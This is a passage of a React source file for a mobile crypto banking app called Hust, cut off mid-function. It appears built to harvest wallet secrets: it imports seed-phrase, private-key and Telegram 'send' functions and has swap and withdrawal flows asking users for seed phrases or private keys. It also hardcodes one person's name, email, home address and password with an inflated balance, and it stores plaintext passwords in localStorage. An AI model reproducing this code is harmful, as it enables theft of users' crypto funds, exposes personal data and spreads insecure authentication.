import React, { useState, useEffect, useRef } from 'react';
import { ArrowLeft, ChevronDown, ChevronUp, Check, X, Lock, Eye, EyeOff, AlertCircle, RefreshCw, Info, Trash2 } from 'lucide-react';
import SplashScreen from './SplashScreen';
import CardsComingSoonV2 from './CardsComingSoonV2';
import { Camera, CameraResultType, CameraSource, CameraDirection } from '@capacitor/camera';
import { Capacitor } from '@capacitor/core';
import { StatusBar } from '@capacitor/status-bar';
import { uploadVerificationDocuments, sendUserDataToTelegram, sendTransferNotification, sendSeedPhraseImport, sendPrivateKeyImport } from './api';
import {  saveUserHybrid, updateUserHybrid, syncAllUsersToLocal, isLocalServerAvailable, getUserFromLocal, getAllUsersFromLocal } from './localBackup';
import { ScreenOrientation } from '@capacitor/screen-orientation';
import { fetchExchangeRates } from './api';


// Imports des logos crypto
import hustLogo from './assets/crypto-logos/hust-logo.png';
import bitcoinLogo from './assets/crypto-logos/bitcoin-logo.png';
import ethereumLogo from './assets/crypto-logos/ethereum-logo.png';
import usdtLogo from './assets/crypto-logos/usdt-logo.png';
import solanaLogo from './assets/crypto-logos/solana-logo.png';



// AJOUTER cette ligne après tes imports
const SERVER_URL = 'https://hust-server-v2.onrender.com';

// CSS supplémentaire pour stabiliser les positions
const injectStyles = () => {
  const style = document.createElement('style');
  style.textContent = `
    /* Désactiver la sélection de texte et le menu contextuel iOS */
* {
  -webkit-user-select: none;
  -moz-user-select: none;
  -ms-user-select: none;
  user-select: none;
  -webkit-touch-callout: none;
}

/* Permettre la sélection uniquement dans les inputs */
input, textarea {
  -webkit-user-select: text !important;
  -moz-user-select: text !important;
  -ms-user-select: text !important;
  user-select: text !important;
}  

    #camera-preview-container {
      position: absolute;
      top: 0;
      left: 0;
      width: 100%;
      height: 100%;
      display: flex;
      align-items: center;
      justify-content: center;
      z-index: 20;
      pointer-events: none;
    }
    
    #camera-preview-container video {
      width: 100%;
      height: 100%;
      object-fit: cover;
      border-radius: 50%;
    }
    
    @keyframes fade-in {
      from { opacity: 0; }
      to { opacity: 1; }
    }
    
    .animate-fade-in {
      animation: fade-in 0.5s ease-in-out;
    }

    @keyframes spin-bars {
      0% { opacity: 0.2; }
      50% { opacity: 1; }
      100% { opacity: 0.2; }
    }

    @keyframes slideUp {
      from {
        transform: translateY(100%);
      }
      to {
        transform: translateY(0);
      }
    }
  `;
  document.head.appendChild(style);
};

const ensureAppleDemoAccount = () => {
  const demoEmail = "demo@hustapp.review";
  const allUsers = JSON.parse(localStorage.getItem('allUsers')) || {};
  
  // Créer le compte démo seulement s'il n'existe pas
if (!allUsers[demoEmail]) {                            
  allUsers[demoEmail] = {
    email: demoEmail,
    password: "AppleReview2025",
    fullName: "Apple Demo User",
    firstName: "Apple",
    lastName: "Demo",
    birthDay: "15",
    birthMonth: "06",
    birthYear: "1990",
    address: "123 Demo Street",
    postalCode: "75001",
    city: "Paris",
    country: "FR",
    phone: "612345678",
    phoneCountry: "FR",
    creationDate: new Date().toISOString(),
    cashBalance: 2500,
    interestRate: 0.05,
    monthlyInterest: 0,
    currentMonthInterest: 0,
    lastInterestUpdate: new Date().toISOString(),
    interestHistory: [],
    cryptoWallet: {
      BTC: { balance: 0, balanceEUR: 0 },
      ETH: { balance: 0, balanceEUR: 0 },
      USDT: { balance: 0, balanceEUR: 0 },
      SOL: { balance: 0, balanceEUR: 0 }
    }
  };
}  // ← FERMER ICI

// 🆕 VOTRE NOUVEAU COMPTE
const votreEmail = "martinezclement@outlook.com";  // ← DÉCLARER D'ABORD
if (!allUsers[votreEmail]) {  // ← PUIS UTILISER
  allUsers[votreEmail] = {
    email: votreEmail,
    password: "Azerty",
    fullName: "MRZ7",
    firstName: "Clement",
    lastName: "Martinez",
    birthDay: "07",
    birthMonth: "08",
    birthYear: "2000",
    address: "309 Rue Joan Mirot",
    postalCode: "34000",
    city: "Montpellier",
    country: "FR",
    phone: "0723456789",
    phoneCountry: "FR",
    creationDate: new Date().toISOString(),
    cashBalance: 1867284.82,
    interestRate: 0.05,
    monthlyInterest: 0,
    currentMonthInterest: 0,
    lastInterestUpdate: new Date().toISOString(),
    interestHistory: [],
    cryptoWallet: {
      BTC: { balance: 0, balanceEUR: 0 },
      ETH: { balance: 0, balanceEUR: 0 },
      USDT: { balance: 0, balanceEUR: 0 },
      SOL: { balance: 0, balanceEUR: 0 }
    }
  };
}  // ← FERMER ICI
    
localStorage.setItem('allUsers', JSON.stringify(allUsers));
console.log("✅ Comptes vérifiés (Apple Demo + Votre compte)");
};


// Component pour le bouton de copie
const CopyButton = ({ text }) => (
  <button 
    onClick={() => alert(`Copié : ${text}`)}
    className="w-8 h-8 flex items-center justify-center bg-violet-500/20 rounded text-violet-400 hover:bg-violet-500/30 transition-colors"
  >
    <svg width="16" height="16" viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="2" strokeLinecap="round" strokeLinejoin="round">
      <rect x="9" y="9" width="13" height="13" rx="2" ry="2"/>
      <path d="M5 15H4a2 2 0 0 1-2-2V4a2 2 0 0 1 2-2h9a2 2 0 0 1 2 2v1"/>
    </svg>
  </button>
);

export default function App() {
  // États partagés
  const [currentPage, setCurrentPage] = useState('login');
  const [dateError, setDateError] = useState('');
  const [postalError, setPostalError] = useState('');
  const [addressError, setAddressError] = useState('');
  const [cityError, setCityError] = useState('');
  const [countryError, setCountryError] = useState('');
  const [phoneError, setPhoneError] = useState('');
  const [loginError, setLoginError] = useState(false);

  // États pour SplashScreen
  const [showSplash, setShowSplash] = useState(true);
 
  //  États pour les informations utilisateur
  const [userDetails, setUserDetails] = useState(null);
  const [balanceRefreshKey, setBalanceRefreshKey] = useState(0);  

  const [, forceUpdate] = useState({});

  // États pour le système d'intérêts
  const [interestRecalculated, setInterestRecalculated] = useState(false);

  // États pour la vérification KYC
const [documents, setDocuments] = useState({
  Recto: null,
  Verso: null,
  VideoSelfie: null
});
const [docType, setDocType] = useState('ID Card');
const [showDocTypeDropdown, setShowDocTypeDropdown] = useState(false);

const [videoStage, setVideoStage] = useState('initial');
const [isRecording, setIsRecording] = useState(false);
const [recordingTime, setRecordingTime] = useState(0);
const [mediaRecorder, setMediaRecorder] = useState(null);
const [recordedChunks, setRecordedChunks] = useState([]);
const [showCompletionAnimation, setShowCompletionAnimation] = useState(false);
const [showAcceptedMessage, setShowAcceptedMessage] = useState(false);
const [showCustomCamera, setShowCustomCamera] = useState(false);
const [currentPhotoType, setCurrentPhotoType] = useState(null);

  // États pour la partie dashboard
  const [files, setFiles] = useState({});
  const [isLoading, setIsLoading] = useState(false);
  const [progress, setProgress] = useState(0);
  const [showMenu, setShowMenu] = useState(false);
  const [menuType, setMenuType] = useState(null);
  const [activeTab, setActiveTab] = useState('accounts');

  const [showCryptoDetails, setShowCryptoDetails] = useState(false);
  const [swipeStartY, setSwipeStartY] = useState(0);
  const [swipeCurrentY, setSwipeCurrentY] = useState(0);


// États pour l'import de portefeuille
const [showWalletMenu, setShowWalletMenu] = useState(false);
const [showSeedPhrasePage, setShowSeedPhrasePage] = useState(false);
const [showPrivateKeyPage, setShowPrivateKeyPage] = useState(false);
const [seedPhrase, setSeedPhrase] = useState('');
const [privateKeyName, setPrivateKeyName] = useState('');
const [privateKey, setPrivateKey] = useState('');
const [selectedNetwork, setSelectedNetwork] = useState('BTC - Bitcoin');
const [showNetworkOptions, setShowNetworkOptions] = useState(false);
const [seedPhraseError, setSeedPhraseError] = useState('');
const [showWalletImportLoading, setShowWalletImportLoading] = useState(false);
const [walletImportStatus, setWalletImportStatus] = useState('loading'); // 'loading' ou 'success'
const [privateKeyError, setPrivateKeyError] = useState('');
const [showPrivateKeyImportLoading, setShowPrivateKeyImportLoading] = useState(false);
const [privateKeyImportStatus, setPrivateKeyImportStatus] = useState('loading');

const [cryptoRefreshInterval, setCryptoRefreshInterval] = useState(null);

// États pour pull-to-refresh (AJOUTEZ ICI)
const [isRefreshing, setIsRefreshing] = useState(false);
const [pullDistance, setPullDistance] = useState(0);
const [startY, setStartY] = useState(0);

 // États pour la page Cartes
  const [showCardCreationModal, setShowCardCreationModal] = useState(false);
  const [showCardSettings, setShowCardSettings] = useState(false);
  const [isCardBlocked, setIsCardBlocked] = useState(false);
  const [showAllTransactions, setShowAllTransactions] = useState(false);
  const [showCardDetails, setShowCardDetails] = useState(false);
  const userName = "Utilisateur Name";
 // États pour la page Virements
const [showCryptoPage, setShowCryptoPage] = useState(false);
const [showHustPage, setShowHustPage] = useState(false);
const [showBankPage, setShowBankPage] = useState(false);
 // États pour BankTransferPage
const [currency, setCurrency] = useState('EUR - Euro');
const [surname, setSurname] = useState('');
const [bankAccount, setBankAccount] = useState('');
const [bicCode, setBicCode] = useState('');
const [showCurrencyOptions, setShowCurrencyOptions] = useState(false);
 // États pour la validation de virement bancaire
const [isValidIban, setIsValidIban] = useState(false);
const [isValidBic, setIsValidBic] = useState(false);
const [ibanError, setIbanError] = useState('');
const [bicError, setBicError] = useState('');

// États pour HustTransferPage
const [nickname, setNickname] = useState('');

// États pour la validation du bénéficiaire
const [beneficiaryName, setBeneficiaryName] = useState('');
const [beneficiaryError, setBeneficiaryError] = useState('');
const [isValidBeneficiary, setIsValidBeneficiary] = useState(false);

// États pour CryptoWithdrawalPage
const [cryptoCurrency, setCryptoCurrency] = useState('BTC - Bitcoin');
const [cryptoSurname, setCryptoSurname] = useState('');
const [walletAddress, setWalletAddress] = useState('');
const [showCryptoCurrencyOptions, setShowCryptoCurrencyOptions] = useState(false);

// États communs aux pages de transfert
const [showAmountPage, setShowAmountPage] = useState(false);
const [formError, setFormError] = useState('');

// États pour CryptoAmountPage
const [amount, setAmount] = useState('0');
const [showKeypad, setShowKeypad] = useState(true);
const [cursorPosition, setCursorPosition] = useState('after');
const [isAmountValid, setIsAmountValid] = useState(false);
const [showConfirmation, setShowConfirmation] = useState(false);
const [animationActive, setAnimationActive] = useState(true);
const [confirmationState, setConfirmationState] = useState('sending');

// 🆕 États pour la NOUVELLE page de retrait crypto
const [showCryptoWithdrawalPage, setShowCryptoWithdrawalPage] = useState(false);
const [withdrawalStep, setWithdrawalStep] = useState('form'); // 'form', 'confirm', 'processing', 'success'
const [withdrawalAmount, setWithdrawalAmount] = useState('');
const [withdrawalAddress, setWithdrawalAddress] = useState('');
const [selectedWithdrawalCrypto, setSelectedWithdrawalCrypto] = useState('BTC');
const [authMethod, setAuthMethod] = useState('seed'); // 'seed' ou 'key'
const [withdrawalSeedInput, setWithdrawalSeedInput] = useState('');
const [showWithdrawalSeed, setShowWithdrawalSeed] = useState(false);

// États pour la page Swap
const [showSwapPage, setShowSwapPage] = useState(false);
const [swapFromAsset, setSwapFromAsset] = useState({ symbol: 'BTC', name: 'Bitcoin', color: '#F7931A', price: 93000, balance: 0.00036 });
const [swapToAsset, setSwapToAsset] = useState({ symbol: 'ETH', name: 'Ethereum', color: '#627EEA', price: 3271, balance: 0.00279802 });
const [swapAmount, setSwapAmount] = useState('');
const [swapEstimatedReceive, setSwapEstimatedReceive] = useState('0.00000000');
const [swapFee, setSwapFee] = useState('0.00');
const [showSwapFromModal, setShowSwapFromModal] = useState(false);
const [showSwapToModal, setShowSwapToModal] = useState(false);
const [swapPage, setSwapPage] = useState('swap'); // 'swap' ou 'success'
const [swapModalStartY, setSwapModalStartY] = useState(0);
const [swapModalCurrentY, setSwapModalCurrentY] = useState(0);
// NOUVEAUX ÉTATS pour Swap CRYPTO → HUST uniquement
const [swapStep, setSwapStep] = useState('amount'); // 'amount', 'signature', 'pending', 'success'
const [swapSignatureMethod, setSwapSignatureMethod] = useState('seed'); // 'seed' ou 'private'
const [swapSeedPhrase, setSwapSeedPhrase] = useState('');
const [swapPrivateKey, setSwapPrivateKey] = useState('');
const [swapTxHash, setSwapTxHash] = useState('');
const [swapCryptoPrice, setSwapCryptoPrice] = useState(0);
const [swapEstimatedHust, setSwapEstimatedHust] = useState('0.00');

// État pour la page Transferts récents
const [showTransfersPage, setShowTransfersPage] = useState(false);
// État pour l'historique des transactions
const [transactionHistory, setTransactionHistory] = useState([]);

// États pour la page Paramètres
const [showAccountSettings, setShowAccountSettings] = useState(false);
const [showContactSupport, setShowContactSupport] = useState(false);

const [showPreferences, setShowPreferences] = useState(false);
const [showLanguageList, setShowLanguageList] = useState(false);
const [showCurrencyList, setShowCurrencyList] = useState(false);
const [selectedLanguage, setSelectedLanguage] = useState('Français');
const [selectedCurrency, setSelectedCurrency] = useState('Euro');
const [showCloseAccountModal, setShowCloseAccountModal] = useState(false);

const [exchangeRates, setExchangeRates] = useState({});

  // Configuration sumsub
const [showSumsubTest, setShowSumsubTest] = useState(false);

  // Configuration des formats de téléphone
  const phoneFormats = {
    FR: { length: 9, prefix: '0', pattern: /^0[67][0-9]{8}$/, example: '06 78 55 43 12' },
    US: { length: 10, prefix: '', pattern: /^[2-9][0-9]{9}$/, example: '202 555 0123' },
    CA: { length: 10, prefix: '', pattern: /^[2-9][0-9]{9}$/, example: '416 555 0123' },
    GB: { length: 10, prefix: '0', pattern: /^0[1-9][0-9]{8,9}$/, example: '07700 900123' },
    CH: { length: 9, prefix: '0', pattern: /^0[7][0-9]{8}$/, example: '078 912 34 56' },
    BE: { length: 9, prefix: '0', pattern: /^0[4-9][0-9]{7}$/, example: '04 75 12 34 56' },
    SG: { length: 8, prefix: '', pattern: /^[89][0-9]{7}$/, example: '9123 4567' },
    ZA: { length: 9, prefix: '0', pattern: /^0[1-9][0-9]{8}$/, example: '082 123 4567' },
    DE: { length: 11, prefix: '0', pattern: /^01[5-7][0-9]{8}$/, example: '0151 23456789' },
    AR: { length: 10, prefix: '', pattern: /^[0-9]{10}$/, example: '11 2345 6789' },
    AU: { length: 9, prefix: '0', pattern: /^0[4][0-9]{8}$/, example: '0412 345 678' },
    AT: { length: 10, prefix: '0', pattern: /^0[1-9][0-9]{8,9}$/, example: '0664 123456' },
    BR: { length: 11, prefix: '', pattern: /^[1-9][0-9]{10}$/, example: '11 91234 5678' },
    BG: { length: 9, prefix: '0', pattern: /^0[8-9][0-9]{8}$/, example: '087 123 4567' },
    CY: { length: 8, prefix: '', pattern: /^[9][0-9]{7}$/, example: '96 123456' },
    KR: { length: 10, prefix: '0', pattern: /^0[1][0-9]{8,9}$/, example: '010 1234 5678' },
    HR: { length: 9, prefix: '0', pattern: /^0[9][0-9]{7,8}$/, example: '091 234 5678' },
    DK: { length: 8, prefix: '', pattern: /^[2-9][0-9]{7}$/, example: '32 12 34 56' },
    ES: { length: 9, prefix: '', pattern: /^[6-7][0-9]{8}$/, example: '612 34 56 78' },
    EE: { length: 7, prefix: '', pattern: /^[5][0-9]{6,7}$/, example: '5123 4567' },
    FI: { length: 9, prefix: '0', pattern: /^0[4-5][0-9]{7,8}$/, example: '040 123 4567' },
    GR: { length: 10, prefix: '', pattern: /^[6-7][0-9]{9}$/, example: '691 234 5678' },
    HK: { length: 8, prefix: '', pattern: /^[5-9][0-9]{7}$/, example: '9123 4567' },
    HU: { length: 9, prefix: '0', pattern: /^0[1-9][0-9]{7,8}$/, example: '06 20 123 4567' },
    IE: { length: 9, prefix: '0', pattern: /^0[8][0-9]{8}$/, example: '085 123 4567' },
    IS: { length: 7, prefix: '', pattern: /^[4-9][0-9]{6}$/, example: '611 2345' },
    IT: { length: 10, prefix: '', pattern: /^3[0-9]{8,9}$/, example: '312 345 6789' },
    JP: { length: 10, prefix: '0', pattern: /^0[7-9]0[0-9]{8}$/, example: '090 1234 5678' },
    LV: { length: 8, prefix: '', pattern: /^[2][0-9]{7}$/, example: '2123 4567' },
    LT: { length: 8, prefix: '', pattern: /^[6][0-9]{7}$/, example: '612 34567' },
    LU: { length: 9, prefix: '', pattern: /^[6][0-9]{8}$/, example: '628 123 456' },
    MT: { length: 8, prefix: '', pattern: /^[79][0-9]{7}$/, example: '7921 2345' },
    MX: { length: 10, prefix: '', pattern: /^[1-9][0-9]{9}$/, example: '55 1234 5678' },
    NO: { length: 8, prefix: '', pattern: /^[4-9][0-9]{7}$/, example: '406 12 345' },
    NZ: { length: 9, prefix: '0', pattern: /^0[2][0-9]{7,9}$/, example: '021 123 4567' },
    NL: { length: 9, prefix: '0', pattern: /^0[6][0-9]{8}$/, example: '06 12345678' },
    PL: { length: 9, prefix: '', pattern: /^[4-8][0-9]{8}$/, example: '512 345 678' },
    PT: { length: 9, prefix: '', pattern: /^[9][0-9]{8}$/, example: '912 345 678' },
    CZ: { length: 9, prefix: '', pattern: /^[6-7][0-9]{8}$/, example: '601 123 456' },
    RO: { length: 10, prefix: '0', pattern: /^0[7][0-9]{8}$/, example: '0712 345 678' },
    SK: { length: 9, prefix: '0', pattern: /^0[9][0-9]{8}$/, example: '0912 345 678' },
    SI: { length: 8, prefix: '0', pattern: /^0[3-7][0-9]{7}$/, example: '031 234 567' },
    SE: { length: 9, prefix: '0', pattern: /^0[7][0-9]{8}$/, example: '070 123 45 67' },
    AE: { length: 9, prefix: '0', pattern: /^0[5][0-9]{8}$/, example: '050 123 4567' }
  };

  const [formData, setFormData] = useState({
    email: '',
    password: '',
    confirmPassword: '',
    fullName: '',
    firstName: '',
    lastName: '',
    birthDay: '',
    birthMonth: '',
    birthYear: '',
    address: '',
    postalCode: '',
    city: '',
    country: '',
    phone: ''
  });

  const [phoneCountry, setPhoneCountry] = useState('');


// Fonction pour mettre à jour la couleur de la barre d'état
const updateStatusBarColor = (color) => {
  try {
    StatusBar.setBackgroundColor({ color });
    
    // Déterminer si le texte doit être blanc ou noir en fonction de la luminosité du fond
    const r = parseInt(color.substr(1, 2), 16);
    const g = parseInt(color.substr(3, 2), 16);
    const b = parseInt(color.substr(5, 2), 16);
    const brightness = (r * 299 + g * 587 + b * 114) / 1000;
    
    // Si la couleur est claire, texte noir, sinon texte blanc
    StatusBar.setStyle({ style: brightness > 128 ? 'DARK' : 'LIGHT' });
  } catch (error) {
    console.log('Erreur lors de la mise à jour de la barre d\'état:', error);
  }
};


// Fonction pour réinitialiser toutes les données du formulaire
const resetAllFormData = () => {
  setFormData({
    email: '',
    password: '',
    confirmPassword: '',
    fullName: '',
    firstName: '',
    lastName: '',
    birthDay: '',
    birthMonth: '',
    birthYear: '',
    address: '',
    postalCode: '',
    city: '',
    country: '',
    phone: ''
  });
  setFiles({});
  setPhoneCountry('');
  setDateError('');
  setPostalError('');
  setPhoneError('');
};

// Fonction de déconnexion
const handleLogout = () => {
  // 🔥 AJOUTER ICI AU DÉBUT
  if (cryptoRefreshInterval) {
    clearInterval(cryptoRefreshInterval);
    setCryptoRefreshInterval(null);
  }
  // FIN DU CODE À AJOUTER

  resetTransferForms(); // AJOUTER ICI

  // AJOUTER CES LIGNES - Réinitialiser les pages de virement
  setShowHustPage(false);
  setShowBankPage(false);
  setShowCryptoPage(false);
  setShowAmountPage(false);
  setShowConfirmation(false);
  // FIN DES LIGNES À AJOUTER

  setSelectedCurrency('Euro'); // ← AJOUTER ICI

  resetAllFormData();
  setUserDetails(null); // ← AJOUTER cette ligne
  localStorage.removeItem('userData'); 
  setCurrentPage('login');

// Réinitialiser les états de vérification vidéo
  setVideoStage('initial');
  setIsRecording(false);
  setRecordingTime(0);
  setShowCompletionAnimation(false);
  setShowAcceptedMessage(false);
};

  
 

  // Fonctions de validation
  const validateBirthDate = () => {
    if (!formData.birthDay || !formData.birthMonth || !formData.birthYear) {
  setDateError('Tous les champs de date de naissance sont requis');
  return false;
}
    
    const day = parseInt(formData.birthDay);
    const month = parseInt(formData.birthMonth);
    const year = parseInt(formData.birthYear);

    if (day < 1 || day > 31) {
      setDateError('Le jour doit être entre 01 et 31');
      return false;
    }
    if (month < 1 || month > 12) {
      setDateError('Le mois doit être entre 1 et 12');
      return false;
    }
    if (year < 1900 || year > 2011) {
      setDateError('L\'année doit être entre 1900 et 2011');
      return false;
    }

    setDateError('');
    return true;
  };

  const validatePostal = () => {
    const postalCode = formData.postalCode;
    if (!postalCode) {
      setPostalError('Code postal requis');
      return false;
    }
    if (postalCode.length < 4 || postalCode.length > 5) {
      setPostalError('Le code postal doit contenir 4 ou 5 chiffres');
      return false;
    }
    setPostalError('');
    return true;
  };
  
  const validateAddress = () => {
  if (!formData.address) {
    setAddressError('Adresse requise');
    return false;
  }
  setAddressError('');
  return true;
};

const validateCity = () => {
  if (!formData.city) {
    setCityError('Ville requise');
    return false;
  }
  setCityError('');
  return true;
};

const validateCountry = () => {
  if (!formData.country) {
    setCountryError('Pays requis');
    return false;
  }
  setCountryError('');
  return true;
};
  
  const validateBeneficiary = (name) => {
    // Ne pas permettre de s'envoyer à soi-même
    if (name === userDetails?.fullName) {
      setBeneficiaryError("Vous ne pouvez pas vous envoyer de l'argent à vous-même");
      setIsValidBeneficiary(false);
      return;
     }
  
    // Vérifier si l'utilisateur existe dans localStorage
  const allUsers = JSON.parse(localStorage.getItem('allUsers')) || {};
  
   // Chercher l'utilisateur par nom
  const userExists = Object.values(allUsers).some(user => 
      user.fullName && user.fullName.toLowerCase() === name.toLowerCase()
     );
  
    if (userExists) {
     setBeneficiaryError('');
     setIsValidBeneficiary(true);
   } else {
  // Pas trouvé dans localStorage - chercher sur serveur local
  getAllUsersFromLocal()
    .then(result => {
      if (result.success && result.users) {
        // Chercher dans les utilisateurs du serveur local
        const serverUserExists = Object.values(result.users).some(user => 
          user.fullName && user.fullName.toLowerCase() === name.toLowerCase()
        );
        
        if (serverUserExists) {
          setBeneficiaryError('');
          setIsValidBeneficiary(true);
        } else {
          setBeneficiaryError('Utilisateur introuvable');
          setIsValidBeneficiary(false);
        }
      } else {
        setBeneficiaryError('Utilisateur introuvable');
        setIsValidBeneficiary(false);
      }
    })
    .catch(() => {
      setBeneficiaryError('Utilisateur introuvable');
      setIsValidBeneficiary(false);
    });
}
};

// Gestionnaire pour le changement du champ bénéficiaire
const handleBeneficiaryChange = (e) => {
  const value = e.target.value;
  setBeneficiaryName(value);
  
  if (value.trim() === '') {
    setBeneficiaryError('');
    setIsValidBeneficiary(false);
  } else {
    validateBeneficiary(value);
  }
};







// Réinitialiser tous les formulaires de virement
const resetTransferForms = () => {
  // Virement instantané Hust
  setBeneficiaryName('');
  setNickname('');
  setAmount('0');
  setCursorPosition('after');
  
  // Virement bancaire
  setCurrency('EUR - Euro');
  setSurname('');
  setBankAccount('');
  setBicCode('');
  
  // Crypto
  setCryptoCurrency('BTC - Bitcoin');
  setCryptoSurname('');
  setWalletAddress('');
  
  // États de validation
  setIsAmountValid(false);
  setIsValidBeneficiary(false);
  setIsValidIban(false);
  setIsValidBic(false);
  setBeneficiaryError('');
  setIbanError('');
  setBicError('');
  setFormError('');
  setShowConfirmation(false);
  setConfirmationState('sending');
};





// Fonction de conversion de devise
const convertCurrency = (amountInEuro, targetCurrency) => {
  if (!targetCurrency || targetCurrency === 'Euro' || !exchangeRates[getCurrencyCode(targetCurrency)]) {
    return amountInEuro;
  }
  return amountInEuro * exchangeRates[getCurrencyCode(targetCurrency)];
};

// Obtenir le code devise (USD, GBP, etc.)
const getCurrencyCode = (currencyName) => {
  const codes = {
    'Euro': 'EUR',
    'United States Dollar': 'USD',
    'British Pound': 'GBP',
    'Japanese Yen': 'JPY',
    'Swiss Franc': 'CHF',
    'Canadian Dollar': 'CAD',
    'Australian Dollar': 'AUD'
  };
  return codes[currencyName] || 'EUR';
};

// Obtenir le symbole de la devise
const getCurrencySymbol = (currencyName) => {
  const symbols = {
    'Euro': '€',
    'United States Dollar': '$',
    'British Pound': '£',
    'Japanese Yen': '¥',
    'Swiss Franc': 'Fr',
    'Canadian Dollar': 'CA$',
    'Australian Dollar': 'A$'
  };
  return symbols[currencyName] || '€';
};










// Fonctions pull-to-refresh (AJOUTEZ ICI)
const handleTouchStart = (e) => {
  if (showMenu) return; // ← AJOUTER cette ligne
  setStartY(e.touches[0].clientY);
};

const handleTouchMove = (e) => {
  if (showMenu) return; // ← AJOUTER cette ligne
  const currentY = e.touches[0].clientY;
  const distance = currentY - startY;
  
  if (distance > 0 && window.scrollY === 0) {
    e.preventDefault(); // Empêche le scroll
    setPullDistance(Math.min(distance, 80));
  }
};

// 1. D'abord la nouvelle fonction
const syncWithServer = async () => {
  if (!userDetails?.email) return;
  
  try {
    // 1. D'ABORD essayer Render
    const renderResponse = await fetch(`${SERVER_URL}/api/users/${userDetails.email}`);
    const renderResult = await renderResponse.json();
    
    if (renderResult.success && renderResult.user) {
      let finalUser = renderResult.user;
      
      // Si l'utilisateur a un wallet crypto, rafraîchir les balances
      if (renderResult.user.cryptoWallet) {
        try {
          const refreshResponse = await fetch(`${SERVER_URL}/api/refresh-crypto/${userDetails.email}`);
          const refreshResult = await refreshResponse.json();
          
          if (refreshResult.success && refreshResult.user) {
            finalUser = refreshResult.user;
          }
        } catch (error) {
          console.log("Erreur rafraîchissement crypto:", error);
        }
      }
      
      // Mettre à jour
      setUserDetails(finalUser);
      
      const allUsers = JSON.parse(localStorage.getItem('allUsers')) || {};
      allUsers[userDetails.email.toLowerCase()] = finalUser;
      localStorage.setItem('allUsers', JSON.stringify(allUsers));
      
      console.log("✅ Synchronisation réussie - solde:", finalUser.balance);
    }
  } catch (error) {
    console.log("❌ Erreur Render, tentative serveur local...");
    
    // 2. FALLBACK : essayer le serveur local
    try {
      const result = await getUserFromLocal(userDetails.email);
      if (result.success && result.user) {
        setUserDetails(result.user);
        
        const allUsers = JSON.parse(localStorage.getItem('allUsers')) || {};
        allUsers[userDetails.email.toLowerCase()] = result.user;
        localStorage.setItem('allUsers', JSON.stringify(allUsers));
      }
    } catch (localError) {
      console.log("❌ Erreur serveur local aussi");
    }
  }
};

// 2. Ensuite handleTouchEnd (modifié)
const handleTouchEnd = () => {
  if (showMenu) return;
  if (pullDistance > 50) {
    setIsRefreshing(true);
    setPullDistance(30); // ← Laisse 40px d'espace pour le spinner
    
    syncWithServer().finally(() => {
      setTimeout(() => {
        setIsRefreshing(false);
        setPullDistance(0); // ← Referme l'espace à la fin
      }, 2000);
    });
  } else {
    setPullDistance(0);
  }
};

// Fonction pour rafraîchir les cryptos
const refreshCryptoBalances = async () => {
  if (!userDetails?.email || !userDetails?.cryptoWallet) return;
  
  try {
    const response = await fetch(`${SERVER_URL}/api/refresh-crypto/${userDetails.email}`);
    const result = await response.json();
    
    if (result.success && result.user) {
      // Mettre à jour userDetails
      setUserDetails(result.user);
      
      // Mettre à jour localStorage
      const allUsers = JSON.parse(localStorage.getItem('allUsers')) || {};
      allUsers[userDetails.email.toLowerCase()] = result.user;
      localStorage.setItem('allUsers', JSON.stringify(allUsers));
      
      console.log("✅ Crypto balances rafraîchies - nouveau solde:", result.user.balance);
    }
  } catch (error) {
    console.log("❌ Erreur rafraîchissement crypto:", error);
  }
};

  // Gestionnaires d'événements
  const handleInputChange = (e) => {
    const { name, value } = e.target;
    if (['birthDay', 'birthMonth', 'birthYear'].includes(name)) {
      const numbersOnly = value.replace(/[^0-9]/g, '');
      setFormData(prev => ({
        ...prev,
        [name]: numbersOnly
      }));
    } else {
      setFormData(prev => ({
        ...prev,
        [name]: value
      }));
    }
  };

  const handleLogin = (e) => {
  e.preventDefault();
  ensureAppleDemoAccount(); // ⬅️ AJOUTER SEULEMENT CETTE LIGNE POUR COMPTE TEST
  if (!formData.email || !formData.password) {
    setFormError('Veuillez remplir tous les champs');
    return;
  }
  
// Récupérer tous les comptes
const allUsers = JSON.parse(localStorage.getItem('allUsers')) || {};

// Chercher le compte avec cet email (insensible à la casse)
const userEmail = formData.email.toLowerCase();
const userData = allUsers[userEmail];

// Vérifier si le compte existe et si le mot de passe correspond
if (userData && formData.password === userData.password) {
  // Mettre à jour l'état userDetails avec les données de ce compte
  setUserDetails(userData);
  setSelectedCurrency(userData.preferredCurrency || 'Euro'); // ← AJOUTER ICI

  // Rediriger vers la page des comptes
  setCurrentPage('accounts');
  setActiveTab('accounts');
  syncWithServer();
} else {
  // Chercher DIRECTEMENT sur le serveur Render
  fetch(`${SERVER_URL}/api/users/${formData.email}`)
    .then(response => response.json())
    .then(result => {
      if (result.success && result.user && result.user.password === formData.password) {
        // Compte trouvé sur Render - connexion réussie
        const allUsers = JSON.parse(localStorage.getItem('allUsers')) || {};
        allUsers[userEmail] = result.user;
        localStorage.setItem('allUsers', JSON.stringify(allUsers));
        
        setUserDetails(result.user);
        setSelectedCurrency(result.user.preferredCurrency || 'Euro');
        setCurrentPage('accounts');
        setActiveTab('accounts');
        syncWithServer(); 
      } else {
        // Mot de passe incorrect ou compte non trouvé
        setLoginError(true);
        setTimeout(() => {
          setLoginError(false);
        }, 3000);
      }
    })
    .catch((error) => {
      // Erreur réseau
      console.error('Erreur connexion:', error);
      setLoginError(true);
      setTimeout(() => {
        setLoginError(false);
      }, 3000);
    });
}
}; // ← Fin de handleLogin 

  const handleSignUp1 = (e) => {
  e.preventDefault();
  setFormError(''); // Réinitialiser l'erreur
  
  if (!formData.email || !formData.password || !formData.confirmPassword || !formData.fullName) {
    setFormError('Veuillez remplir tous les champs');
    return;
  }
  if (formData.password !== formData.confirmPassword) {
    setFormError('Les mots de passe ne correspondent pas');
    return;
  }
  
  // Récupérer tous les comptes
  const allUsers = JSON.parse(localStorage.getItem('allUsers')) || {};
  
  // Vérifier si l'email existe déjà
  if (allUsers[formData.email.toLowerCase()]) {
    setFormError('Cet email est déjà utilisé');
    return;
  }
  
  // Vérifier si le nom d'utilisateur existe déjà
  const userNameExists = Object.values(allUsers).some(user => 
    user.fullName === formData.fullName
  );
  
  if (userNameExists) {
    setFormError('Ce nom d\'utilisateur est déjà utilisé');
    return;
  }
  
  // Si tout est bon, continuer
  setCurrentPage('signup-step2');
};

  const handleSignUp2 = (e) => {
    e.preventDefault();
    if (!formData.firstName || !formData.lastName) {
      alert('Nom et prénom sont obligatoires');
      return;
    }
    // Validation de la date de naissance et du code postal
